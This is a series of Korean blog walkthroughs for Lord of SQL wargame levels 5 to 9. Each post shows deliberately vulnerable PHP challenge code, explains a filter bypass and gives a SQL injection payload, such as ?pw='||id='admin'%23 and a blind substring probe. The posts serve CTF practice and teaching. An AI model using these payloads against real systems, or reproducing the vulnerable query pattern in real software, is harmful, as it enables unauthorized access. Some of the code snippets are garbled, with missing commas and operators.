query : select id from prob_vampire where id=''

<?php 
  include "./config.php"
  login_chk(); 
  dbconnect(); 
  if(preg_match('/\'/i'$_GET[id])) exit("No Hack ~_~");
  $_GET[id] = strtolower($_GET[id]);
  $_GET[id] = str_replace("admin","",$_GET[id]); 
  $query "select id from prob_vampire where id='{$_GET[id]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result['id'] == 'admin'solve("vampire"); 
  highlight_file(__FILE__); 
?>


  if($result['id'] == 'admin'solve("vampire"); 


쿼리의 결과값 id가 admin이 되면 됩니다. id를 소문자로 변경 후 str_replace로 admin을 공백으로 치환시킵니다. admin이 사라지는걸 생각해서 adadminmin을 넣으면 admin으로 치환되는것으로 문제를 해결할 수 있습니다.



?id=adadminmin 

payload




저작자표시 비영리 동일조건

'Web > LOS (Lord of SQL)' 카테고리의 다른 글

los(lord of sql) level 11 - golem  (0) 2018.08.21
los(lord of sql) level 10 - skeleton  (0) 2018.08.21
los(lord of sql) level 8 - troll  (0) 2018.08.21
los(lord of sql) level 7 - orge  (0) 2018.08.21
los(lord of sql) level 6 - darkelf  (0) 2018.08.21
query : select id from prob_troll where id=''

<?php  
  include "./config.php"
  login_chk(); 
  dbconnect(); 
  if(preg_match('/\'/i'$_GET[id])) exit("No Hack ~_~");
  if(@ereg("admin",$_GET[id])) exit("HeHe");
  $query "select id from prob_troll where id='{$_GET[id]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysql_fetch_array(mysql_query($query));
  if($result['id'] == 'admin'solve("troll");
  highlight_file(__FILE__);
?>


  if($result['id'] == 'admin'solve("troll");


쿼리의 결과값 id가 admin만 나오면 됩니다. 다만 php의 ereg 함수를 써서 admin을 필터링 하고있네요.


ereg는 대소문자를 따로 구분하기 때문에 대소문자 섞어 써주면 문제를 풀 수 있습니다.


?id=Admin 

payload







저작자표시 비영리 동일조건

'Web > LOS (Lord of SQL)' 카테고리의 다른 글

los(lord of sql) level 10 - skeleton  (0) 2018.08.21
los(lord of sql) level 9 - vampire  (0) 2018.08.21
los(lord of sql) level 7 - orge  (0) 2018.08.21
los(lord of sql) level 6 - darkelf  (0) 2018.08.21
los(lord of sql) level 5 - wolfman  (0) 2018.08.21
query : select id from prob_orge where id='guest' and pw=''

<?php 
  include "./config.php"
  login_chk(); 
  dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i'$_GET[pw])) exit("HeHe"); 
  $query "select id from prob_orge where id='guest' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"
  $result = @mysql_fetch_array(mysql_query($query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 
  highlight_file(__FILE__); 
?>


  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 


blind sqli로 pw값을 구해야 합니다. id는 admin으로 고정이고 or / and 논리연산자가 필터링 되어있습니다.


 ?pw='||id='admin'%26%26substr(pw,1,1)=0x41%23

...

payload








저작자표시 비영리 동일조건

'Web > LOS (Lord of SQL)' 카테고리의 다른 글

los(lord of sql) level 9 - vampire  (0) 2018.08.21
los(lord of sql) level 8 - troll  (0) 2018.08.21
los(lord of sql) level 6 - darkelf  (0) 2018.08.21
los(lord of sql) level 5 - wolfman  (0) 2018.08.21
los(lord of sql) level 4 - orc  (0) 2018.08.21
query : select id from prob_darkelf where id='guest' and pw=''

<?php 
  include "./config.php"
  login_chk(); 
  dbconnect();  
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i'$_GET[pw])) exit("HeHe"); 
  $query "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
  if($result['id'] == 'admin'solve("darkelf"); 
  highlight_file(__FILE__); 
?>


  if($result['id'] == 'admin'solve("darkelf"); 

이전 문제와 마찬가지입니다. 쿼리의 결과값으로 id가 admin만 나오면 됩니다. 이번엔 or와 and를 필터링 해놨네요. 이전 문제와 똑같이 풀 수 있습니다.


?pw='||id='admin'%23 

payload







저작자표시 비영리 동일조건

'Web > LOS (Lord of SQL)' 카테고리의 다른 글

los(lord of sql) level 8 - troll  (0) 2018.08.21
los(lord of sql) level 7 - orge  (0) 2018.08.21
los(lord of sql) level 5 - wolfman  (0) 2018.08.21
los(lord of sql) level 4 - orc  (0) 2018.08.21
los(lord of sql) level 3 - goblin  (0) 2018.08.21
query : select id from prob_wolfman where id='guest' and pw=''

<?php 
  include "./config.php"
  login_chk(); 
  dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/ /i'$_GET[pw])) exit("No whitespace ~_~"); 
  $query "select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysql_fetch_array(mysql_query($query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
  if($result['id'] == 'admin'solve("wolfman"); 
  highlight_file(__FILE__); 
?>


if($result['id'] == 'admin'solve("wolfman"); 


쿼리의 결과로 id값이 admin만 나오면 되네요. id는 guest로 고정이고 pw에 싱글쿼터 필터링은 걸려있지 않습니다만 공백 필터링이 걸려있네요. 근데 or은 ||로 치환되는것만 알아도 문제는 풀 수 있습니다.


?pw='||id='admin'%23 

payload








저작자표시 비영리 동일조건

'Web > LOS (Lord of SQL)' 카테고리의 다른 글

los(lord of sql) level 7 - orge  (0) 2018.08.21
los(lord of sql) level 6 - darkelf  (0) 2018.08.21
los(lord of sql) level 4 - orc  (0) 2018.08.21
los(lord of sql) level 3 - goblin  (0) 2018.08.21
los(lord of sql) level 2 - cobolt  (0) 2018.08.21

+ Recent posts

티스토리툴바